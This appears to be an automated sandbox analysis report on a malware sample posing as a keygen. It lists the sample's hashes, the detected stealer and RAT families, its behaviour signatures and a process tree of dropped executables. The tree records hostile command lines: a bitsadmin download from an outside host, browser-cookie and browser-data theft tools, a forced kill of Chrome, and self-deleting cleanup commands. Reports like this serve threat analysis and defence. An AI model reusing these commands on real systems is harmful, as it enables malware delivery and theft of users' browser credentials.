Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1638s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 14:36

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 62 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 36 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 40 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2704
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2436
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2420
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2260
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2240
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1880
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1412
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1384
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1184
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1136
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1040
                    • C:\Users\Admin\AppData\Roaming\vhutvvi
                      C:\Users\Admin\AppData\Roaming\vhutvvi
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4976
                    • C:\Users\Admin\AppData\Roaming\fautvvi
                      C:\Users\Admin\AppData\Roaming\fautvvi
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4824
                      • C:\Users\Admin\AppData\Roaming\fautvvi
                        C:\Users\Admin\AppData\Roaming\fautvvi
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:6224
                    • C:\Users\Admin\AppData\Roaming\vhutvvi
                      C:\Users\Admin\AppData\Roaming\vhutvvi
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6024
                    • C:\Users\Admin\AppData\Roaming\fautvvi
                      C:\Users\Admin\AppData\Roaming\fautvvi
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5536
                      • C:\Users\Admin\AppData\Roaming\fautvvi
                        C:\Users\Admin\AppData\Roaming\fautvvi
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:6116
                    • C:\Users\Admin\AppData\Roaming\vhutvvi
                      C:\Users\Admin\AppData\Roaming\vhutvvi
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6768
                    • C:\Users\Admin\AppData\Roaming\fautvvi
                      C:\Users\Admin\AppData\Roaming\fautvvi
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5448
                      • C:\Users\Admin\AppData\Roaming\fautvvi
                        C:\Users\Admin\AppData\Roaming\fautvvi
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5632
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll",ogdtzM
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:6752
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1004
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3864
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2064
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2464
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2732
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4356
                        • C:\Users\Admin\AppData\Local\Temp\is-T1O2U.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-T1O2U.tmp\Install.tmp" /SL5="$50138,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4388
                          • C:\Users\Admin\AppData\Local\Temp\is-6DCLB.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-6DCLB.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4464
                            • C:\Program Files\MSBuild\OHAUPXFSEZ\ultramediaburner.exe
                              "C:\Program Files\MSBuild\OHAUPXFSEZ\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4724
                              • C:\Users\Admin\AppData\Local\Temp\is-ROIJL.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-ROIJL.tmp\ultramediaburner.tmp" /SL5="$701E8,281924,62464,C:\Program Files\MSBuild\OHAUPXFSEZ\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4760
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4816
                            • C:\Users\Admin\AppData\Local\Temp\d8-577d1-721-8eabb-0199ad11c6ad2\Waginyxuxu.exe
                              "C:\Users\Admin\AppData\Local\Temp\d8-577d1-721-8eabb-0199ad11c6ad2\Waginyxuxu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4796
                            • C:\Users\Admin\AppData\Local\Temp\f9-5e3eb-41b-a05b7-8985435d65e17\Qusezhucecu.exe
                              "C:\Users\Admin\AppData\Local\Temp\f9-5e3eb-41b-a05b7-8985435d65e17\Qusezhucecu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4892
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gjw3lys0.lpq\KiffMainE1.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:424
                                • C:\Users\Admin\AppData\Local\Temp\gjw3lys0.lpq\KiffMainE1.exe
                                  C:\Users\Admin\AppData\Local\Temp\gjw3lys0.lpq\KiffMainE1.exe
                                  7⤵
                                    PID:5096
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k1xqlubi.efa\001.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2112
                                  • C:\Users\Admin\AppData\Local\Temp\k1xqlubi.efa\001.exe
                                    C:\Users\Admin\AppData\Local\Temp\k1xqlubi.efa\001.exe
                                    7⤵
                                      PID:5196
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\35r0y1pl.4lu\installer.exe /qn CAMPAIGN="654" & exit
                                    6⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:5184
                                    • C:\Users\Admin\AppData\Local\Temp\35r0y1pl.4lu\installer.exe
                                      C:\Users\Admin\AppData\Local\Temp\35r0y1pl.4lu\installer.exe /qn CAMPAIGN="654"
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Enumerates connected drives
                                      • Modifies system certificate store
                                      • Suspicious use of FindShellTrayWindow
                                      PID:5284
                                      • C:\Windows\SysWOW64\msiexec.exe
                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\35r0y1pl.4lu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\35r0y1pl.4lu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619879514 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                        8⤵
                                          PID:5292
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2kdgkk4a.nz5\gpooe.exe & exit
                                      6⤵
                                        PID:5580
                                        • C:\Users\Admin\AppData\Local\Temp\2kdgkk4a.nz5\gpooe.exe
                                          C:\Users\Admin\AppData\Local\Temp\2kdgkk4a.nz5\gpooe.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          PID:5672
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5828
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:1744
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:3856
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5572
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5lyxfjo.mfa\google-game.exe & exit
                                        6⤵
                                          PID:5160
                                          • C:\Users\Admin\AppData\Local\Temp\k5lyxfjo.mfa\google-game.exe
                                            C:\Users\Admin\AppData\Local\Temp\k5lyxfjo.mfa\google-game.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:5320
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                              8⤵
                                              • Loads dropped DLL
                                              • Modifies registry class
                                              PID:5512
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22fmomyo.d4d\y1.exe & exit
                                          6⤵
                                            PID:4484
                                            • C:\Users\Admin\AppData\Local\Temp\22fmomyo.d4d\y1.exe
                                              C:\Users\Admin\AppData\Local\Temp\22fmomyo.d4d\y1.exe
                                              7⤵
                                                PID:776
                                                • C:\Users\Admin\AppData\Local\Temp\sMHFYLzKCm.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\sMHFYLzKCm.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Modifies system certificate store
                                                  PID:6344
                                                  • C:\Users\Admin\AppData\Roaming\1620138847488.exe
                                                    "C:\Users\Admin\AppData\Roaming\1620138847488.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620138847488.txt"
                                                    9⤵
                                                      PID:6936
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\sMHFYLzKCm.exe"
                                                      9⤵
                                                        PID:4484
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 127.0.0.1 -n 3
                                                          10⤵
                                                          • Runs ping.exe
                                                          PID:6392
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\22fmomyo.d4d\y1.exe"
                                                      8⤵
                                                        PID:6424
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          9⤵
                                                          • Delays execution with timeout.exe
                                                          PID:6508
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\omtmkiwg.veb\askinstall39.exe & exit
                                                    6⤵
                                                      PID:1968
                                                      • C:\Users\Admin\AppData\Local\Temp\omtmkiwg.veb\askinstall39.exe
                                                        C:\Users\Admin\AppData\Local\Temp\omtmkiwg.veb\askinstall39.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5196
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                          8⤵
                                                            PID:4524
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              9⤵
                                                              • Kills process with taskkill
                                                              PID:4740
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rbthqyx3.eqa\setup.exe & exit
                                                        6⤵
                                                          PID:4524
                                                          • C:\Users\Admin\AppData\Local\Temp\rbthqyx3.eqa\setup.exe
                                                            C:\Users\Admin\AppData\Local\Temp\rbthqyx3.eqa\setup.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5784
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rbthqyx3.eqa\setup.exe"
                                                              8⤵
                                                                PID:2376
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                  9⤵
                                                                  • Runs ping.exe
                                                                  PID:5780
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2rerdrj4.ewc\request2.exe & exit
                                                            6⤵
                                                              PID:4364
                                                              • C:\Users\Admin\AppData\Local\Temp\2rerdrj4.ewc\request2.exe
                                                                C:\Users\Admin\AppData\Local\Temp\2rerdrj4.ewc\request2.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:5336
                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:4536
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                    parse.exe -f json -b edge
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:6948
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                    parse.exe -f json -b chrome
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:6992
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                    parse.exe -f json -b firefox
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:6924
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahmyturc.vvl\SunLabsPlayer.exe /S & exit
                                                              6⤵
                                                                PID:5564
                                                                • C:\Users\Admin\AppData\Local\Temp\ahmyturc.vvl\SunLabsPlayer.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\ahmyturc.vvl\SunLabsPlayer.exe /S
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  PID:6140
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5496
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:6180
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:6300
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4708
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5932
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:4692
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  9⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5096
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                • Checks for any installed AV software in registry
                                                                                PID:3964
                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                8⤵
                                                                                • Download via BitsAdmin
                                                                                PID:2476
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfGNXVQDAS5gsjBB -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                PID:3744
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:4784
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5464
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4832
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:6020
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:4360
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:5972
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
                                                                                          8⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:6164
                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
                                                                                            9⤵
                                                                                            • Loads dropped DLL
                                                                                            • Drops file in System32 directory
                                                                                            PID:2388
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:1480
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:4996
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:6524
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6936
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswB05C.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:5300
                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:5824
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mip3542e.tbt\005.exe & exit
                                                                                        6⤵
                                                                                          PID:5416
                                                                                          • C:\Users\Admin\AppData\Local\Temp\mip3542e.tbt\005.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\mip3542e.tbt\005.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5528
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eiescmrs.3ti\ifhwwyy.exe & exit
                                                                                          6⤵
                                                                                            PID:5420
                                                                                            • C:\Users\Admin\AppData\Local\Temp\eiescmrs.3ti\ifhwwyy.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\eiescmrs.3ti\ifhwwyy.exe
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4316
